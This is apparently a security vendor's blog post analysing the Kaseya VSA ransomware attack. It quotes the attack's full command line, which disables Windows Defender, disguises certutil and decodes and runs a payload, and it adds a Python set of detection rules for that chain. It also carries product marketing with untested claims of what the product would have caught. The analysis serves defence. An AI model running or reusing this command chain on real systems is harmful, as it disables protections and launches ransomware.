How Seceon could have stopped the ransomware rolled out over Kaseya

Attacks and attacker tradecraft keep changing. The recent attack on Kaseya is the result of what the industry is still missing in terms of cybersecurity. The attack came into action a few days ago and emerged in a brutal way, infecting around 1,500 businesses worldwide according to the statement by Kaseya's CEO. The names of the infected companies have not yet been released. One visible result was the Swedish supermarket chain Coop, which was forced to close stores; Coop is one of the clients of the hacked MSPs and reportedly had 2,100 endpoints infected.
A $70 million ransom was demanded for a universal decryptor to restore the victims' data. The REvil ransomware gang is considered responsible for this operation. It is still unclear whether REvil prepared the attack themselves or one of their affiliates did. Kaseya was forced to shut down its cloud infrastructure completely to stop malicious updates from spreading, and advised all customers to power down their VSA servers, which created a lot of chaos.

What is VSA, how was it compromised, and how did the ransomware roll over it?

VSA is a remote monitoring and management tool, in effect a remote access tool (RAT) that gives complete access to the system or device its agent is installed on, so that IT technicians can diagnose and fix problems remotely. Not every organization has the resources to manage its infrastructure in house, so many outsource that task to a Managed Service Provider (MSP). An MSP often manages the systems of hundreds of companies simultaneously. Kaseya sells VSA to MSPs, and VSA also ships as an on-premises version that the customer runs in its own environment; MSPs typically need this server to manage all of their clients' systems, and it was these VSA servers, each managing a lot of clients, that were compromised. Whoever controls such a server has access to every client enrolled in it, and that is how the initial compromise turned into mass compromise. Soon after the attack rolled out, all VSA servers were advised to shut down.

The operation was large enough to count as mass ransomware, unlike the usual ransomware case where a single organization is infected, all of its systems are encrypted and a ransom is demanded. Here hundreds of organizations around the world were encrypted simultaneously by the same ransomware campaign, tunnelled through what looked like a Kaseya software update; from its inception it was a supply-chain attack. The compromise was of Kaseya's VSA server itself rather than of any victim's directory, as we usually see in ransomware incidents. The VSA server was used to ransom a lot of organizations in a single click, and that, at a high level, is what happened.

How does it propagate?

The scenario is this: if devices run Kaseya's agent to apply monitoring policy and report to a central VSA server, and that server is compromised, then every system connected to it is at high risk. That is how the attack propagated as a chain, one system after another, and affected thousands of servers and endpoints.

How did the initial compromise begin, and how does aiXDR detect it?

A vulnerability in the VSA server was exploited. Seceon aiXDR is designed to detect and remediate exploited vulnerabilities and zero-day attacks at a very early stage. Here is a step-by-step analysis:

• aiXDR monitors all inbound and outbound connections; in this case aiXDR should have detected a connection from a blacklisted IP or a prohibited country and automatically blocked it.
• Once the connection was made, the attacker transferred the agent payload to the host. aiXDR can detect data exfiltration and in this case should have blocked that connection so that the payload (agent.crt, decoded to agent.exe on the host) could not be downloaded and no data could be transferred to external hosts.
• Once agent.exe was on the host, it performed scans to reach other hosts; aiXDR should have detected those scans and automatically quarantined the host so it could not infect others.

A caveat a practitioner should keep in mind: the payload arrived through the VSA server's own agent-procedure channel, the same channel used for legitimate updates, so network blacklists alone are a weak signal here, and the host-side process telemetry below is the more reliable one.

The following command line was launched by the C:\Program Files (x86)\Kaseya\<ID>\AgentMon.exe file of the Kaseya VSA platform (cmd.exe invoking PowerShell and certutil):

"C:\WINDOWS\system32\cmd.exe" /c ping 127.0.0.1 -n 4979 > nul & C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend & copy /Y C:\Windows\System32\certutil.exe C:\Windows\cert.exe & echo %RANDOM% >> C:\Windows\cert.exe & C:\Windows\cert.exe -decode c:\kworking\agent.crt c:\kworking\agent.exe & del /q /f c:\kworking\agent.crt C:\Windows\cert.exe & c:\kworking\agent.exe

Read left to right: the ping of 127.0.0.1 with a count of 4979 is a sleep of roughly 83 minutes (one echo request per second) that delays execution; Set-MpPreference switches off Windows Defender's real-time monitoring, intrusion prevention, IOAV protection, script scanning, controlled folder access, cloud reporting and sample submission; certutil.exe is copied to cert.exe and a random value is appended to change its hash; the copy decodes the dropped agent.crt into agent.exe; the encoded file and the renamed decoder are deleted; and agent.exe is executed.

• As AgentMon.exe starts its first child process to execute this command, aiXDR would have detected a new process started by AgentMon.exe from C:\Program Files (x86)\Kaseya\.
• aiXDR detects when any protection service is disabled on the host; here the attacker disabled Windows Defender's protection services.
• aiXDR detects a process renamed to masquerade as something else; here certutil.exe was copied and renamed to cert.exe.

What was the impact?

The threat actor was able to execute code on the VSA server, which let them use the scripts (agent procedures) tied to Kaseya's application to push out procedures or agent updates. Pushing procedures to all managed agents is part of the application's normal functionality; the agents run on the computers managed by the solution. The attackers simply ran a procedure against all managed clients that copied a file to each of them and executed it, and that is how they ended up infecting all these systems. Several steps had to succeed one after another for the attack to work, but surprisingly none of them was looked at or detected in between.
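The detections listed above (a new child process of AgentMon.exe, Defender protection being disabled, certutil.exe masquerading as cert.exe) can be written as rules over process-creation telemetry. What follows is an added example in Python, not Seceon's aiXDR logic or Kaseya's code: the event records, the field names parent_image, image and command_line, and the sample events are all constructed here, and AGENTID stands in for the per-agent folder under \Kaseya\ that the page shows as <ID>. It also covers two details of the quoted command line that the list above does not name: the ping-to-loopback sleep and the random bytes appended to cert.exe to change its hash.

```python
"""Process-creation detection for the AgentMon.exe command chain quoted above.

Added example, not Seceon's or Kaseya's code. The events below are constructed
to mimic the fields of a Sysmon Event ID 1 / EDR process-creation record.
"""
import re

# Constructed sample telemetry (not captured data). Event 1 reproduces the
# command line quoted on the page; AGENTID stands in for the per-agent folder
# under \Kaseya\. Events 2-5 are benign or near-miss activity for judging noise.
SAMPLE_EVENTS = [
    {"id": 1, "parent_image": r"C:\Program Files (x86)\Kaseya\AGENTID\AgentMon.exe",
     "image": r"C:\WINDOWS\system32\cmd.exe",
     "command_line": (
         r'"C:\WINDOWS\system32\cmd.exe" /c ping 127.0.0.1 -n 4979 > nul & '
         r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Set-MpPreference "
         r"-DisableRealtimeMonitoring $true -DisableIntrusionPreventionSystem $true "
         r"-DisableIOAVProtection $true -DisableScriptScanning $true "
         r"-EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode "
         r"-Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend & "
         r"copy /Y C:\Windows\System32\certutil.exe C:\Windows\cert.exe & "
         r"echo %RANDOM% >> C:\Windows\cert.exe & "
         r"C:\Windows\cert.exe -decode c:\kworking\agent.crt c:\kworking\agent.exe & "
         r"del /q /f c:\kworking\agent.crt C:\Windows\cert.exe & c:\kworking\agent.exe")},
    # A legitimate VSA agent procedure also spawns cmd.exe from AgentMon.exe.
    {"id": 2, "parent_image": r"C:\Program Files (x86)\Kaseya\AGENTID\AgentMon.exe",
     "image": r"C:\WINDOWS\system32\cmd.exe",
     "command_line": r'"C:\WINDOWS\system32\cmd.exe" /c ipconfig /all'},
    # An admin verifying a download hash with the real certutil.
    {"id": 3, "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\certutil.exe",
     "command_line": r"certutil.exe -hashfile C:\tmp\image.iso SHA256"},
    # certutil -decode writing a text file, not an executable.
    {"id": 4, "parent_image": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\certutil.exe",
     "command_line": r"certutil -decode C:\tmp\blob.b64 C:\tmp\blob.txt"},
    # Reading, not changing, Defender settings.
    {"id": 5, "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": r"powershell.exe Get-MpPreference"},
]

SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}
DEFENDER_TAMPER = re.compile(
    r"set-mppreference\s.*?(?:-disable\w+\s+\$true|-mapsreporting\s+disabled|"
    r"-submitsamplesconsent\s+neversend|-enablecontrolledfolderaccess\s+disabled)", re.I)
COPY_CERTUTIL = re.compile(r"\bcopy\s+(?:/y\s+)?\S*certutil\.exe\s+(\S+)", re.I)
DECODE_BY = re.compile(r"^(\S+)\s+-decode\b", re.I)
DECODE_TO_EXE = re.compile(r"-decode\s+\S+\s+\S+\.exe\b", re.I)
HASH_BUST = re.compile(r"\becho\s+\S+\s*>>\s*\S+\.exe\b", re.I)
PING_SLEEP = re.compile(r"\bping\s+(?:127\.0\.0\.1|localhost)\s+-n\s+(\d+)", re.I)


def _basename(path):
    return path.strip('"').lower().rsplit("\\", 1)[-1]


def rule_agentmon_spawns_shell(ev):
    # AgentMon.exe under \Kaseya\ starting a shell. Legitimate procedures do this
    # too, so alone it is a weak signal; it is scored together with the others.
    parent = ev["parent_image"].lower()
    return (_basename(parent) == "agentmon.exe" and "\\kaseya\\" in parent
            and _basename(ev["image"]) in SHELLS)


def rule_defender_tampering(ev):
    # Set-MpPreference used to switch off a Defender protection feature.
    return bool(DEFENDER_TAMPER.search(ev["command_line"]))


def rule_certutil_masquerade(ev):
    # certutil.exe copied under another name, or a non-certutil image using -decode.
    cl = ev["command_line"]
    m = COPY_CERTUTIL.search(cl)
    if m and _basename(m.group(1)) != "certutil.exe":
        return True
    for segment in cl.split("&"):
        d = DECODE_BY.match(segment.strip())
        if d and _basename(d.group(1)) not in ("certutil", "certutil.exe"):
            return True
    return False


def rule_decode_to_executable(ev):
    # -decode writing an .exe: base64 used to carry a binary past content inspection.
    return bool(DECODE_TO_EXE.search(ev["command_line"]))


def rule_hash_busting(ev):
    # Appending bytes to an .exe so its hash no longer matches a known one.
    return bool(HASH_BUST.search(ev["command_line"]))


def rule_ping_sleep(ev):
    # ping to loopback with a large count is a sleep (about 1 s per request; 4979 is ~83 min).
    m = PING_SLEEP.search(ev["command_line"])
    return bool(m) and int(m.group(1)) >= 30


RULES = {fn.__name__[len("rule_"):]: fn for fn in (
    rule_agentmon_spawns_shell, rule_defender_tampering, rule_certutil_masquerade,
    rule_decode_to_executable, rule_hash_busting, rule_ping_sleep)}


def evaluate(events):
    """Map event id -> sorted names of matching rules; events with no hit are omitted."""
    hits = {}
    for ev in events:
        matched = sorted(name for name, fn in RULES.items() if fn(ev))
        if matched:
            hits[ev["id"]] = matched
    return hits


def triage(events, min_rules=2):
    """Event ids worth an alert: at least min_rules independent rules on one process creation."""
    return sorted(i for i, names in evaluate(events).items() if len(names) >= min_rules)


if __name__ == "__main__":
    for event_id, names in evaluate(SAMPLE_EVENTS).items():
        print(event_id, ", ".join(names))
    print("alert on:", triage(SAMPLE_EVENTS))
```

Run directly, it prints the matched rule names per event. AgentMon.exe spawning cmd.exe fires on its own for the benign procedure (event 2) as well, which is why triage() requires at least two independent rules on the same process creation before raising an alert; the quoted command line trips all six.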
Approach after infection

• There are always indicators left on a system that show whether and how it was compromised. In this case logs were cleared at multiple stages: the event logs were gone and other types of logs inside the application database itself were deleted, but some logs remained that showed what the VSA server had pushed out to manage clients. Those logs became the starting point for investigating how the systems were targeted from the VSA server.

Few indications of being ransomware

Ransomware has become a complete business model and threat actors are making a lot of money from it. A few indications:

• All files on the system get encrypted and a README file is left stating the ransom amount. The file extensions change, which is a clear indication that an attack occurred.
• Some files may not get encrypted; this happens when the ransomware did not execute successfully, i.e. it ran only partially.
• Preparatory execution that disables antivirus functionality such as Windows Defender or other security layers.

Brief about Seceon aiXDR

Seceon aiXDR is highly effective, enriched with machine learning, AI, big data, dynamic threat intelligence, strong correlation and in-depth analysis, which allows it to cut the threat at its roots at a very early stage. The solution detects the origin of the threat, whether it is coming from the network, an application, a host or a machine. One of its most interesting features is showing everything that was done in the course of an attack attempt and how the Seceon solution stopped it in between, keeping the environment secure with 360-degree comprehensive visibility, proactive threat detection, and automatic stopping of threats and breaches in real time.

Customers should always make sure they are not just taking a solution that is problem specific; the solution should be capable of protecting the environment from all kinds of threats and malicious activity, whether known or unknown. Seceon aiXDR is a single all-in-one platform that eliminates siloed solutions and delivers the essential result in a comprehensive manner.

Diagram: the Seceon aiXDR approach, "Continuous real-time Monitoring, proactive Detection & auto Stop threats and breaches". Best Cybersecurity ROI.
Contact Us
Address - 238 Littleton Road, Suite #206, Westford, MA 01886, USA
Phone Number - +1 (978)-923-0040
Email Id - sales@seceon.com, info@seceon.com
Website - https://www.seceon.com/
Twitter - https://twitter.com/Seceon_Inc